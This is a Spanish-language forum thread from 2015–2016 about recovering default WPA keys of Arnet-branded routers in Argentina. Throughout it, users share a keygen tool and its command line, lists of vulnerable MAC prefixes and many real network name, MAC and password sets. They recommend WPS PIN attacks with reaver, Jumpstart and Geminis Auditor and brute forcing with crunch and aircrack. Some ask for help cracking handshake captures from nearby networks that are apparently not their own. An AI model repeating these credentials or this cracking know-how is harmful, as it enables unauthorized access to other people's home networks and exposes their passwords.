Publicado por: GSN en 12 de Enero de 2015, 12:08:05 pm
yo tengo una pero es EC:CB:30 de Huawei Technologies Co., Ltd
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: GSN en 12 de Enero de 2015, 12:26:37 pm
Otra: 78:6A:89 de Huawei Technologies Co., Ltd . SSID: WiFi-Arnet-ndds Seguridad: WPA-PSK-CCMP
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 12 de Enero de 2015, 07:19:28 pm
He actualizado algo en el script. Deberia estar ya todo arreglado.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 12 de Enero de 2015, 08:57:45 pm
He actualizado algo en el script. Deberia estar ya todo arreglado.

Versión para Windows 1.2 = http://www.arg-wireless.com.ar/Arnet-Archivos/wifiarnet-1.2.rar (http://www.arg-wireless.com.ar/Arnet-Archivos/wifiarnet-1.2.rar)

Edite el primer mensaje del hilo con datos de interés.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Nicash en 12 de Enero de 2015, 11:20:09 pm
Vale aclarar que para sacar la clave con el script necesitamos si o si el BSSID.
Si intentamos comprobar la clave usando la MAC que figura en la etiqueta del router nos va a dar la clave equivocada, ya que la BSSID = MAC de la etiqueta + 1.

Saludos!  :D
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: GSN en 13 de Enero de 2015, 12:25:33 pm
@Nicash: si eso es porque la MAC Address que figura es de una de la Ethers Cableadas, de igual manera ojo con que MAC tiene porque cada Ether tiene una MAC Address diferente, por ende son 5 + 1 Inalambrica.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: buckynet en 13 de Enero de 2015, 01:20:27 pm
Muy guenas a tod@s !!

@D3M0N, la nueva versión del app WPAmagickey se encuentra desde el día de reyes en las tiendas Amazon, Opera, SlideMe, ... en el blog de la aplicación http://WPAmagickey.blogspot.com teneis los enlaces oportunos.

Tambien en mi blog personal http://Buckynet.blogspot.com
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 14 de Enero de 2015, 06:10:21 am
@buckynet: el script es gratuito... tu app no... vivir a cuestas de otros.  :o
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: GSN en 14 de Enero de 2015, 09:34:19 am
@buckynet: anímate y hace una free solo para arnet  ;)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: buckynet en 14 de Enero de 2015, 10:58:15 am
Muy guenas @D3M0N !!

Como supongo que no sabes, llevamos ya bastante tiempo "divertiendonos" con los routers de los ISP europeos junto a mas colegas. Si crees que tus palabras me ofenden personalmente, estas muy equivocado, pero es algo normal y que entiendo desde tu IGNORANCIA sobre este asunto. Te doy una pista, la fecha de compilación del apk de la nueva versión de donación.

Como espero que entiendas, los usuarios de la versión de donación son los primeros en recibir la nueva versión con las actualizaciones y/o modificaciones oportunas, en este caso concreto el añadido de las redes WiFi-Arnet.

La nueva versión de donación ha sido probada por algunos usuarios que están en Argentina, y actualmente están en contacto con nosotros para poder mejorar el calculo del algoritmo de ADB Pirelli del ISP Arnet, y algunas cosas mas. Gracias a tod@s, y nos vemos en la Ekoparty.

La nueva versión gratuita de la app WPAmagickey, con el añadido de las redes WiFi-Arnet, saldrá cuando decidamos y/o queramos. Ahora mismo, los betatesters están haciendo "labores de campo".

Menos charlas y mas trabajar, ya teneis publico un script en python, ahora queremos ver esos fallos "especiales" en el calculo del algoritmo, que pueden existir con los routers de ADB Pirelli de Arnet.

@GSN, si quieres ser betatester, ponte en contacto.

Un saludo.

PD: Como siempre, en algo, habre metido la pata.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 14 de Enero de 2015, 11:20:49 pm
como hago un dumpeo de los firmwares de mis modems?
Aún tengo los 3 que postié en imágenes algunas páginas atrás?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: elpibemc en 14 de Enero de 2015, 11:21:19 pm
Hola, me vengo leyendo todo el hilo desde el principio. Arranco agradeciendo el tiempo y esfuerzo de todos.
Yo soy muy lento en estos temas, pero me interesa bastante aprender un poco más... Alguien me explica como hago para probar con windows ese programa, lo bajé descomprimí y al abrir el ejecutable se cierra al instante. Gracias
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: GSN en 14 de Enero de 2015, 11:23:52 pm
Tenes que entrar con cmd en la carpeta donde esta y hace:

Código: [Seleccionar]
wifiarnet.exe -b (Mac Address) 
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 15 de Enero de 2015, 01:23:53 am
como hago un dumpeo de los firmwares de mis modems?
Aún tengo los 3 que postié en imágenes algunas páginas atrás?

por ahi @2kW79@32WEYS: te va poder guiar sobre como extraer esa info de los modems
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: GSN en 15 de Enero de 2015, 09:47:24 am
por ahi @2kW79@32WEYS: te va poder guiar sobre como extraer esa info de los modems

Lo explico en http://arg-wireless.com.ar/index.php?topic=1006.msg6798#msg6798
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 15 de Enero de 2015, 03:27:16 pm
@badder: Estoy interesado en esos 2 routers. Necesitamos ls firmwares. Si miras el codigo que publique, veras un enlace que dice como fernando3k dumpeo varios routers arnet. Sino googlealo. O como dicen por ahi, leete las ultimas 3 paginas dsd ahora hacia atras. Veras la informacion que necesitas.

Lo mas viable es si tienes telnet y acceso a root. Mirar si tienes en /usr/bin or /usr/sbin netcat en tu sistema(or simplemente nc). Luego bajarte los bloques de firmware.

Saludos.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: GSN en 15 de Enero de 2015, 04:35:25 pm
Acá encontré masomenos un tuto http://www.adslzone.net/postt8030.html (http://www.adslzone.net/postt8030.html) y casualidad salio este vídeo:

http://www.youtube.com/watch?v=9TVbwYWje80
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: elpibemc en 15 de Enero de 2015, 06:37:44 pm
Tenes que entrar con cmd en la carpeta donde esta y hace:

Código: [Seleccionar]
wifiarnet.exe -b (Mac Address) 

Gracias, ahora pude, pero no me dio buen resultado.

Yo probé con un wifi - arnet - XXXX
MAC:08:7a:XX:XX:XX:XX
Y no me dió la clave correcta...
Es el router de un amigo que le saqué una foto a la parte de atras, y la clave esta escrita ahí y es la de por defecto, sin modificar.

Algo que haga mal?? Uso windows...
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: GSN en 15 de Enero de 2015, 06:42:49 pm
Fíjate que @Nicash había nombrado lo de las MAC's: http://arg-wireless.com.ar/index.php?topic=1006.msg6779#msg6779 bájate esta version: http://arg-wireless.com.ar/index.php?topic=1006.msg6785#msg6785 que es la que tiene las dos WPA posibles. Y chequea que este en la lista con el comando -l
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: buckynet en 15 de Enero de 2015, 06:48:42 pm
Muy guenas a tod@s !!

@elpibemc, pasame los datos por privado que lo verifico. Prueba con la opcion -a para generar las claves.

@GSN, gracias. Are you ready for R&R ??

Un saludo.

PD: Como siempre, en algo, habre metido la pata.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 19 de Enero de 2015, 09:07:49 pm
Actualice el primer mensaje del hilo (http://arg-wireless.com.ar/index.php?topic=1006.msg4227#msg4227) indicando nuevas MAC Address de routers WiFi-Arnet-XXXX
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 23 de Enero de 2015, 09:02:33 am
Quiero mencionar que hace más o menos una semana con la ayuda de 2kW79@32WEYS subí los firmwares y algunos ficheros extras que me solicitó sobre los modems que postié en imágenes páginas atrás.
Incluso tiene hasta las MAC wireless (no ethernet) de c/u de ellos.

Solo resta esperar novedades en algún momento.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 23 de Enero de 2015, 05:41:27 pm
Puedes subir si quieres los firmwares a donde veas bajo tu responsabilidad. Asi cualquiera puede intentarlo.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: diogenes en 24 de Enero de 2015, 09:57:29 pm
hola alguien probo el script "geminisauditor"?? http://foro.seguridadwireless.net/live-wifislax/geminisauditor-(wep-wpa-wps)-todo-en-uno/ (http://foro.seguridadwireless.net/live-wifislax/geminisauditor-(wep-wpa-wps)-todo-en-uno/) porque dentro de la lista de redes soportadas en este script http://downloadwireless.net/scripts-live/patrones_conocidos.txt (http://downloadwireless.net/scripts-live/patrones_conocidos.txt) pude ver las redes Wifi-Arnet-????
¿es lo mismo q WPAmagickey?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 26 de Enero de 2015, 12:43:36 am
@diogenes: si te fijas la actualización es del día de ayer... seguramente lo han agregado.  :)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: buckynet en 26 de Enero de 2015, 07:02:44 am
Muy guenas a tod@s !!

Añadido en la Versión 20150125 los siguientes patrones_conocidos para WiFi-Arnet. Para que funcione el último script de wifiarnet.py dentro de Wifislax, y puedo ser lanzado desde geminisauditor o el resto de scripts que existen.  ;D

Un saludo.

PD: Como siempre, en algo, habre metido la pata.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: buckynet en 31 de Enero de 2015, 10:12:14 pm
Muy guenas a tod@s !!

WPAmagickey. WPA Keygen Audit. Version 1.6
WPAmagickey. WPA Keygen Audit Free. Version 1.5


* Añadido ADB Pirelli 'WiFi-Arnet-XXXX' del ISP Arnet Telecom Argentina con BSSID inicial '00:08:27:', '00:13:C8:', '00:17:C2:', '00:19:3E:', '00:1C:A2:', '00:1D:8B:', '00:22:33:', '00:8C:54:', '30:39:F2:', '74:88:8B:', '84:26:15:', 'A4:52:6F:', 'A4:5D:A1:', 'D0:D4:12:', 'D4:D1:84:', 'DC:0B:1A:', 'F0:84:2F:' o con el ESSID modificado.

http://WPAmagickey.blogspot.com

http://www.youtube.com/watch?v=8UXB6rmvwzU

Un saludo.

PD: Como siempre, en algo, habre metido la pata.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: elpibemc en 21 de Febrero de 2015, 03:13:51 pm
Muy guenas a tod@s !!

WPAmagickey. WPA Keygen Audit. Version 1.6
WPAmagickey. WPA Keygen Audit Free. Version 1.5


* Añadido ADB Pirelli 'WiFi-Arnet-XXXX' del ISP Arnet Telecom Argentina con BSSID inicial '00:08:27:', '00:13:C8:', '00:17:C2:', '00:19:3E:', '00:1C:A2:', '00:1D:8B:', '00:22:33:', '00:8C:54:', '30:39:F2:', '74:88:8B:', '84:26:15:', 'A4:52:6F:', 'A4:5D:A1:', 'D0:D4:12:', 'D4:D1:84:', 'DC:0B:1A:', 'F0:84:2F:' o con el ESSID modificado.

http://WPAmagickey.blogspot.com

http://www.youtube.com/watch?v=8UXB6rmvwzU

Un saludo.

PD: Como siempre, en algo, habre metido la pata.
A ver si entiendo... Lo único que tenemos de Wifi-arnet-XXXX es cuando son de Pirelli, otra marca de routers no funciona?? o estoy errado? Perdonen mi ignorancia, estoy aprendiendo, saludos
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 01 de Marzo de 2015, 01:04:57 pm
@elpibemc: si es solo pirelli. En el primer post del hilo tenes toda la info.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: FiWi en 09 de Marzo de 2015, 10:00:29 pm
Hice un resumen de los datos que se fueron aportando hasta el momento:

(http://s28.postimg.org/7byl2ve5p/Arnet.png) (http://postimage.org/)

Descargar en formato PDF (http://docdroid.net/tymw)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: FiWi en 19 de Marzo de 2015, 02:25:20 pm
Hoy me topé con una contraseña de arnet de un router ADB A4001N que incluye un símbolo, algo que no habia visto hasta el momento. Incluye el símbolo de diámetro (ALT + 157).

Les dejo imagen:
(http://i.imgur.com/T5FdbcL.jpg)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Nicash en 26 de Marzo de 2015, 08:54:17 am
Hoy me topé con una contraseña de arnet de un router ADB A4001N que incluye un símbolo, algo que no habia visto hasta el momento. Incluye el símbolo de diámetro (ALT + 157).

Les dejo imagen:
(http://i.imgur.com/T5FdbcL.jpg)

En realidad es el número 0 (cero). Lo deben imprimir con ese caracter para que no se confunda con la letra O. Te puedo confirmar porque tengo un router en mis manos que también lo tiene.

Saludos!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: gonzurro en 27 de Abril de 2015, 01:18:31 pm
Hola el algoritmo me da el password erroneo alguien sabe porque la mac es A4-5D-A1-63-23-F2
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 28 de Abril de 2015, 11:09:20 pm
Quizás cambiaron la contraseña o quizás esa MAC no esta soportada. Probaste con todas las versiones del script? yo por el momento estoy plagado de ZTE Corporation, ZyXEL Communications Corporation..
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: gonzurro en 29 de Abril de 2015, 06:24:25 pm
si probe con los 2 scripts, uno da un pw y el otro 2, de todas formas ninguno funca, este es un a ADB DA 2210, tmb probe con el WPA magic 1.5 y nada..
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: santypk4 en 10 de Mayo de 2015, 07:56:59 pm
Quiero aportar a la lista

Red::Contraseña se respetan mayusculas y minisculas


wifi-arnet-4d41 :: 4FD4A11E29
wifi-arnet-7351 :: 3yva5q66yr
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: piraculis en 27 de Mayo de 2015, 01:36:49 pm
Hola, les quería agradecer por la info que han subido. Dejo mi aporte:

ESSID: WiFi-Arnet-3333
BSSID: F0:84:2F:6F:9B:02         
WPA: j1xdcacbg0

ESSID: WiFi-Arnet-8343   
BSSID: A4:52:6F:0A:2E:E4         
WPA: ueg3q0z8s0

ESSID: WiFi-Arnet-FE03   
BSSID: 84:26:15:E3:FE:04         
WPA: fekoy9nwdl
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: elpibemc en 16 de Junio de 2015, 11:47:21 am
Hola, tengo esto:

Wifi-Arnet_XXXX
28285d55b8c0
la clave que me da wifiarnet-1.2 es: p91cxcdjvw

Es correcto esto?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 16 de Junio de 2015, 09:06:11 pm
@elpibemc: si te conecta si, si no te conecta no.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: elpibemc en 17 de Junio de 2015, 07:49:26 pm
@elpibemc: si te conecta si, si no te conecta no.
Me refiero a que no se si utilizé bien el programa. para que alguien me confirme si le da la misma clave
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: cajosar en 11 de Julio de 2015, 05:31:59 pm
Continuo aportando mas datos que encontré en mercado libre.

ZTE ZXHN H108N
WLAN SSID: WiFi-Arnet-1841
WLAN Security (WPA-PSK): 1852852963
MAC: B4:B3:62:6D:E0.1A - B4:B3:62:6D:E0:20

http://articulo.mercadolibre.com.ar/MLA-461291367-mar-del-plata-modem-router-wi-fi-usb-zte-_JM (http://articulo.mercadolibre.com.ar/MLA-461291367-mar-del-plata-modem-router-wi-fi-usb-zte-_JM)



(http://bimg2.mlstatic.com/mar-del-plata-modem-router-wi-fi-usb-zte_MLA-F-4339857922_052013.jpg)

Lamentablemente la siguiente imagen tiene una pobre definición, los datos parecen ser:

ZTE ZXHN H108N
WLAN SSID: WiFi-Arnet-4703
WLAN Security (WPA-PSK): 5040372nl5
MAC: B4:74:2A:20:5D:FF - B4:74:2A:20:BE:05

http://articulo.mercadolibre.com.ar/MLA-457026287-modem-arnet-wifi-zte-zte-zxhn-h108n-nuevo-en-caja-sin-uso-_JM (http://articulo.mercadolibre.com.ar/MLA-457026287-modem-arnet-wifi-zte-zte-zxhn-h108n-nuevo-en-caja-sin-uso-_JM)

(http://img1.mlstatic.com/modem-arnet-wifi-zte-zte-zxhn-h108n-nuevo-en-caja-sin-uso_MLA-O-4146127433_042013.jpg)

Saludos.

buenas en venezuela la mac es 70:9F:2D  y la clave es un digito numerico de 14 cifras sin letras, si alguien sabe donde generar un diccionario de 14 digitos estaria fino jeje gracias, lo maxico que e conseguido es hasta 10 digitos, saludos
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: marcos2612 en 16 de Julio de 2015, 04:41:55 am
buenas en venezuela la mac es 70:9F:2D  y la clave es un digito numerico de 14 cifras sin letras, si alguien sabe donde generar un diccionario de 14 digitos estaria fino jeje gracias, lo maxico que e conseguido es hasta 10 digitos, saludos

consejo ni te conviene generar diccionarios, trabaja con crunch y reventalas con pyryt o aircrack (pero te vas a volver viejo, búscate algún patrón (aca por ej las claves de fibertel tienen 10 digitos, empiezan con 014 o 004) y por si eso fuera todo los números siguientes corresponden al num de documento sin el ultimo dígito, como veras, pisteaste como campeon asique ya sabes metele paciencia pero sobe todo cerebro que la reventas (ayuda mucho saber el modem, y la version por ahi la reventas con el pin generico sin tanto laburo)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 18 de Julio de 2015, 06:35:11 pm
Mi granito de arena:

Equipo zyxel P-660HNU-T1
ESSID: WiFi-Arnet-3u24
MAC: A0:E4:CB:47:0C:B4
PIN: 46563088
WLAN Security (WPA-PSK): qUsA93z74PA97

Extraído en 1 minuto con Geminis Auditor.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 05 de Agosto de 2015, 09:34:03 am
Otro que conseguí.

Equipo Zyxel P-660HNU-T1 v2
ESSID: WiFi-Arnet-t189
MAC: A0:E4:CB:4B:XX:XX
WLAN Security (WPA-PSK): 7WcYXAAXAbHaA
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 16 de Agosto de 2015, 06:58:52 pm
Vamos con más.  8)

ESSID: WiFi-Arnet-f168
MAC: A0:E4:CB:53:7D:AC
WLAN Security (WPA-PSK): ulpwwrk7oCTjv

ESSID: WiFi-Arnet-gra4
MAC: A0:E4:CB:52:69:9C
WLAN Security (WPA-PSK): mWHb9JKW3RbKW
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 16 de Agosto de 2015, 08:46:12 pm
algun firmware nuevo con el que pasar un rato?

Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 18 de Agosto de 2015, 09:43:29 pm
Algo interesante que encontre:

http://www.youtube.com/watch?v=3aanPGmUkzQ
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Fertxt en 13 de Septiembre de 2015, 04:02:15 pm
Revisando un router con el q me encontre modelo vmg 1312-b10b me di con que tenia cifrado wep contraseña 12345, y wps desactivado pero con un pin wps o distintos segun momentos, 87020397, ese es el numero de pin que tiene ahora pero en otro momento tuvo otro, mi pregunta es, sera que atraves de datos que pueda suministrar de como van cambiando los pines se pueda sacar el algorritmo segun el cual se genera?
Estos routers son los ZyXEL VMG 1312-b10b y con reaver se bloquea el wps cada 3 intentos y se bloquea por bastante tiempo, minimo 2 dias.
Si alguien tiene algun dato sobre estos routers se lo agradecere, sobre todo el pin ya que estoy rodeado de esos routers y tuve la suerte de encontrarme solo con uno de cifrado WEP, todos los demas wpa2 con wps activo.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: LisT en 24 de Septiembre de 2015, 04:44:33 pm
Buenas!!
Leí todo el thread, muchas gracias por sus aportes, se valora su duro trabajo.
Estoy intentando descifrar una red y no tuve exitos hasta el momento.

-ESSID: WiFi-Arnet-1238
-BSSID: a4:5d:a1:81:12:39

Como comienza en a4:5d:a1:XX:XX:XX (está en el listado del script) probé con las generadas por pirelli.py, incluso con el parámetro -a , pero ninguna funcionó
El WPS está desactivado.

Podrian darme una mano con esto? Se los agradezco !!

Dejo adjunto el archivo con el Handshake
http://www.mediafire.com/download/85v6wicqc889ui4/arnet1238.cap (http://www.mediafire.com/download/85v6wicqc889ui4/arnet1238.cap)

Saludos! =)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Fitap en 03 de Noviembre de 2015, 11:29:49 pm
Hola a todos, tremendo trabajo se llevaron a cabo, he leido casi todo el hilo y les comento que tengo dos 4001N y las MAC estan dentro del listado pero la clave que me arroja es incorrecta cuando quiero conectarme al modem, hice la modificacion del script de sacarle +inc pero me sigue dando la misma clave que sino le saco esa variable.

Algo estoy haciendo mal?

Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 15 de Noviembre de 2015, 01:38:26 pm
@Fitap los generadores o keygens no son 100% seguros.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Fitap en 22 de Noviembre de 2015, 03:01:29 pm
Nose que ha pasado ahora, no me funciona ningun script, me arroja este error

Código: [Seleccionar]

File "./wifiarnet.py", line 92
    print "[+] SHA256  : %s" % sha256.hexdigest()
                           ^
SyntaxError: invalid syntax



Saludos.
p.d. alguno con conocimientos de ingenieria inversa para liberar las apk?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 11 de Enero de 2016, 04:49:54 pm
Voy a poner nuevamente arnet.
Me ofrecieron 5 mil minutos local libres y VDSL 10 mb/3 mb a 150 pesos. Final y sin cambios me prometieron estos gansos de telecom.
Apenas tenga el modem saco pic.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 11 de Enero de 2016, 08:42:02 pm
@badder imposible a ese precio, alguna trampa tiene la letra chiquita.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 14 de Enero de 2016, 04:49:01 pm
Si, posta, es VDSL.
Me llegó el modem, instalo filtros, pongo todo y me encuentro con que no tengo la línea digitalizada, por lo tanto, cero sincronización.

Cuando el lunes me vendieron el servicio me garantizó el guaso una digitalización en 10 minutos mientras hablaba conmigo. Me llega hoy jueves y tengo el VDSL titileando.
Levanté el tubo, llamé al 112 y di de baja el servicio antes de siquiera poder usarlo. Que la chupen.
Como decía el mamerto de cutzarida, corta la bocha.

Acá va la foto del modem de arnet marca pinchil@ atomica.

ESSID: WiFi-Arnet-8873
MAC: 4C:09:D4:FA:87:02
WLAN Security (WPA-PSK): hm8t3k2x45

http://www.hapshack.com/images/6f3Od.jpg

(http://i.imgur.com/Fyc7Lbo.jpg)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 14 de Enero de 2016, 05:58:30 pm
@badder te dije! jajaja
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: tizzi en 04 de Febrero de 2016, 02:51:55 pm
Buenas, quería compartirles esta herramienta que utilice para sacar las clave de los router arnet que increiblemente vienen con el pin WPS activado.

En menos de 5 minutos ya estaba conectado, luego lo unico que deben hacer es ir a las propiedades de la red, en la pestaña seguridad, mostrar caracteres y tendran la clave wpa para que utilicen en otro dispositivo.

Intente con un router tp-link y este se bloqueo luego de un rato.

No recuerdo si ya lo han publicado pero dejo el enlace a youtube

http://www.youtube.com/watch?v=uzwoUGn00i4

Logre conectarme a 2 routers


name:WiFi-Arnet-****
clave: N9WTWC3J3NCF9
MAC: A0:E4:CB: - ZyXEL Communications Corporation

name:WiFi-Arnet-****
clave: (los nombres de dos personas, no era por defecto)
MAC: A0:E4:CB: - ZyXEL Communications Corporation
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 04 de Febrero de 2016, 08:40:20 pm
@tizzi interezante, igual dicha herramienta es mas lenta que reaver y no todas las redes arnet tienen wps.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: elpibemc en 08 de Febrero de 2016, 07:46:38 pm
Buenas, quería compartirles esta herramienta que utilice para sacar las clave de los router arnet que increiblemente vienen con el pin WPS activado.

En menos de 5 minutos ya estaba conectado, luego lo unico que deben hacer es ir a las propiedades de la red, en la pestaña seguridad, mostrar caracteres y tendran la clave wpa para que utilicen en otro dispositivo.

Intente con un router tp-link y este se bloqueo luego de un rato.

No recuerdo si ya lo han publicado pero dejo el enlace a youtube

http://www.youtube.com/watch?v=uzwoUGn00i4

Logre conectarme a 2 routers


name:WiFi-Arnet-****
clave: N9WTWC3J3NCF9
MAC: A0:E4:CB: - ZyXEL Communications Corporation

name:WiFi-Arnet-****
clave: (los nombres de dos personas, no era por defecto)
MAC: A0:E4:CB: - ZyXEL Communications Corporation
Lo acabo de probar y no me funciona, se queda el Jumpstar intentando e intentando y luego dice que no puede... ¿Por qué será?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: clauslack en 09 de Febrero de 2016, 02:49:49 pm
Hola, excelente foro !!

Estos son los datos de mi router de Arnet, llegado en 01/2016 (Córdoba)
Arcadyan VR7516QW
SSID: WiFi-Arnet-zrkd
MAC: 5C DC 96 27 2D 88
Clave: udvxaeda4s

Saludos
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: clauslack en 09 de Febrero de 2016, 08:10:55 pm
Aclaro, atras del router la MAC dice
5C DC 96 27 2D 88
pero cuando escaneo las redes en realidad es
54 DC 96 27 2D 88

Los de Arnet le erraron a la impresión del papel.



Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: tizzi en 15 de Febrero de 2016, 05:36:56 pm
Lo acabo de probar y no me funciona, se queda el Jumpstar intentando e intentando y luego dice que no puede... ¿Por qué será?

Lo mas probable es que se te haya bloqueado el router, te comento que yo recien lo estoy experimentando al programa ese y como me dio resultado lo publique, me paso con otra red arnet lo que vos decis pero tenía muy mala señal asi que pense fue eso.

Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 16 de Febrero de 2016, 12:03:31 am
el Jumpstar es igual que reaver la única diferencia es que es manual automatizado, básicamente era un programa para conectarte por qss o wps que lo automatizaron para hacer ataques..
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: elpibemc en 16 de Febrero de 2016, 05:17:54 pm
Lo mas probable es que se te haya bloqueado el router, te comento que yo recien lo estoy experimentando al programa ese y como me dio resultado lo publique, me paso con otra red arnet lo que vos decis pero tenía muy mala señal asi que pense fue eso.
A ver si hago algo mal... Lo primero que hago es ponerla en wps y scanear... Me salen muchas redes que no son wps (O eso es lo que yo creo) (¿Las wps son las que hay que apretar un boton en el router para conectarse o algo así, no?)...

La que me interesa si es wps seguro, es la que está marcada en la imagen... Después le doy a wpswin que es el segundo paso y me da este error... lo probé con todas las redes que me salen...

De todos modos copié el pin y lo pegué en Jumpstart y se queda como 10 minutos y al final nada... ni Pass ni nada...  :(
(http://i67.tinypic.com/10hizph.jpg)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 17 de Febrero de 2016, 12:05:36 am
Detalle técnico, los TP-Link tienen el WPS como la WPA, osea todos numero, captura un hand y le paso el dic haber que onda.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: elpibemc en 17 de Febrero de 2016, 08:57:35 am
Detalle técnico, los TP-Link tienen el WPS como la WPA, osea todos numero, captura un hand y le paso el dic haber que onda.
Este es la CAP, ya le pasé de 8 números, más que eso no me da la máquina...
https://mega.nz/#!aRZQFArA!9Vcp8aqlwSnt2_ntmzLygnj8N4Tz5HvTX6hLQnEZY20
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 23 de Marzo de 2016, 03:17:38 pm
Me encontré con una nueva red wireless, asumo debe ser VDSL.
Lo curioso es el nombre de la red/mac

WiFi-Arnet-BD33B7
30:91:8F:BD:33:B7
WPA2-CCMP


Viene con WPS enabled pero le tiré con todas las tools de WifiSlax y no tuve suerte.
Fabricante Technicolor, por lo que pienso podría ser éste:
Technicolor TG588 (http://arnetonline.arnet.com.ar/Modem.htm)

Alguien tiene info al respecto?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: elhereje en 01 de Abril de 2016, 07:01:14 pm
Hola, estoy en la misma

WiFi-Arnet-XXXXXX
C4:EA:1D:XX:XX:XX
WPA2

Es nueva en mi depto, se ve que tiene un formato nuevo
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: dipa en 01 de Abril de 2016, 08:00:36 pm
Hola

Yo pude obtener todas las redes que probé tipo "WiFi-Arnet-XXXX" inmediatamente. Las instrucciones para hacerlo están aquí: http://www.hackingdream.net/2015/05/hack-wifi-wpa-wpa2-wps-in-windows-in-2.html (http://www.hackingdream.net/2015/05/hack-wifi-wpa-wpa2-wps-in-windows-in-2.html). Por una cuestión de precaución en lo personal decidí no utilizar los links de descarga de ese post (que no conozco de donde sale) y busqué en google cada archivo necesario para bajar.

Espero que les sirva!

Dipa
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 02 de Abril de 2016, 04:07:01 pm
Hola Dipa, voy a probar eso en windows pero estamos hablando de los nuevos modems VDSL que empezó a usar arnet.
Hasta ahora vi uno solo pero no es vulnerable a los ataques WPS incluídos en WifiSlax.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: dipa en 02 de Abril de 2016, 11:47:36 pm
Ah, no leí esa parte. Los que yo conseguí son todos ADSL modelo P-660HNU-TIv2.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 07 de Abril de 2016, 08:31:44 pm
WiFi-Arnet-BD33B7
30:91:8F:BD:33:B7
WPA2-CCMP

Mi sospecha sobre éstos tecnicolor es que en sus WPA Key usan nros del 0 al 9 y letras mayúsculas de la A a la F en 9 a 10 caracteres.
Supongo que hacer un diccionario a esa medida y correrlo será titánico no? ???
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Migue27 en 07 de Abril de 2016, 08:46:07 pm
Imagino que "Titaniquísimo" jajaja
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 07 de Abril de 2016, 08:51:36 pm
